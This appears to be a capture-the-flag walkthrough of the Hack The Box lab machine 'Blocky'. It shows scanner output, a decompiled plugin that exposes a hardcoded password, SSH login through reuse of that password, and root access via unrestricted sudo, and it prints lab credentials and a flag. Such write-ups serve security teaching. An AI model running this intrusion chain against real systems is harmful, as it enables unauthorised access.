2020-04-07
1.1k
HTB::Blocky Walkthrough
0x01 Info Card
nmap
dirsearch
wpscan
jad
0x03 Pentesting
Initial Enumeration
nmap scan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 10:54 CET Nmap scan report for 10.10.10.37 Host is up (0.085s latency). Not shown: 996 filtered ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5a 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA) | 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA) |_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-generator: WordPress 4.8 |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: BlockyCraft – Under Construction! 8192/tcp closed sophos Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 19.32 seconds
dirsearch scan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 $ ./dirsearch.py -u 10.10.10.37 -e * [08:44:06] 301 - 0B - /index.php -> http://10.10.10.37/ [08:44:09] 301 - 315B - /javascript -> http://10.10.10.37/javascript/ [08:44:13] 200 - 19KB - /license.txt [08:44:37] 301 - 315B - /phpmyadmin -> http://10.10.10.37/phpmyadmin/ [08:44:41] 200 - 10KB - /phpmyadmin/ [08:44:42] 301 - 312B - /plugins -> http://10.10.10.37/plugins/ [08:44:46] 200 - 7KB - /readme.html [08:44:52] 403 - 299B - /server-status [08:44:52] 403 - 300B - /server-status/ [08:45:21] 200 - 380B - /wiki/ [08:45:21] 301 - 313B - /wp-admin -> http://10.10.10.37/wp-admin/ [08:45:21] 301 - 309B - /wiki -> http://10.10.10.37/wiki/ [08:45:21] 302 - 0B - /wp-admin/ -> http://10.10.10.37/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.37%2Fwp-admin%2F&reauth=1 [08:45:22] 200 - 1KB - /wp-admin/install.php [08:45:22] 500 - 4KB - /wp-admin/setup-config.php [08:45:22] 200 - 0B - /wp-content/ [08:45:22] 301 - 315B - /wp-content -> http://10.10.10.37/wp-content/ [08:45:23] 200 - 69B - /wp-content/plugins/akismet/akismet.php [08:45:23] 200 - 965B - /wp-content/uploads/ [08:45:23] 301 - 316B - /wp-includes -> http://10.10.10.37/wp-includes/ [08:45:23] 500 - 0B - /wp-includes/rss-functions.php [08:45:23] 200 - 2KB - /wp-login.php [08:45:23] 200 - 40KB - /wp-includes/ [08:45:24] 405 - 42B - /xmlrpc.php Task Completed
wpscan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [i] User(s) Identified: [+] notch | Found By: Author Posts - Author Pattern (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] Notch | Found By: Rss Generator (Passive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) [+] WPVulnDB API OK | Plan: free | Requests Done (during the scan): 3 | Requests Remaining: 47
Getting User Access
Visit http://10.10.10.37/plugin
Download and extract BlockyCore.jar, once the BlockCore.class is extracted we need to do to print out it’s contents is to use the jad command.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 $ jad BlockyCore.class Parsing BlockyCore.class...The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported) Generating BlockyCore.jad $ cat BlockyCore.jad // Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov. // Jad home page: http://www.geocities.com/kpdus/jad.html // Decompiler options: packimports(3) // Source File Name: BlockyCore.java package com.myfirstplugin; public class BlockyCore { public BlockyCore() { sqlHost = "localhost"; sqlUser = "root"; sqlPass = "8YsqfCTnvxAUeduzjNSXe22"; } public void onServerStart() { } public void onServerStop() { } public void onPlayerJoin() { sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!"); } public void sendMessage(String s, String s1) { } public String sqlHost; public String sqlUser; public String sqlPass; }
Get the credentials: notch : 8YsqfCTnvxAUeduzjNSXe22
SSH with notch
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 $ ssh [email protected] [email protected] 's password: Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 7 packages can be updated. 7 updates are security updates. Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230 [email protected] :~$ iduid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare) [email protected] :~$ lsminecraft user.txt [email protected] :~$ cat user.txt 59fee0977fb60b8a0bc6e41e751f3cd5
Getting Root Access
1 2 3 4 5 6 7 8 9 10 11 12 13 14 [email protected] :~$ cat .bash_history sudo su cat .bash_history echo "" > .bash_history exit poweroff sudo poweroff [email protected] :~$ sudo -l[sudo] password for notch: Matching Defaults entries for notch on Blocky: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User notch may run the following commands on Blocky: (ALL : ALL) ALL
Get root flag
0x04 Conclusion
0x05 Reference
https://ech1.netlify.com/htb/easy/1
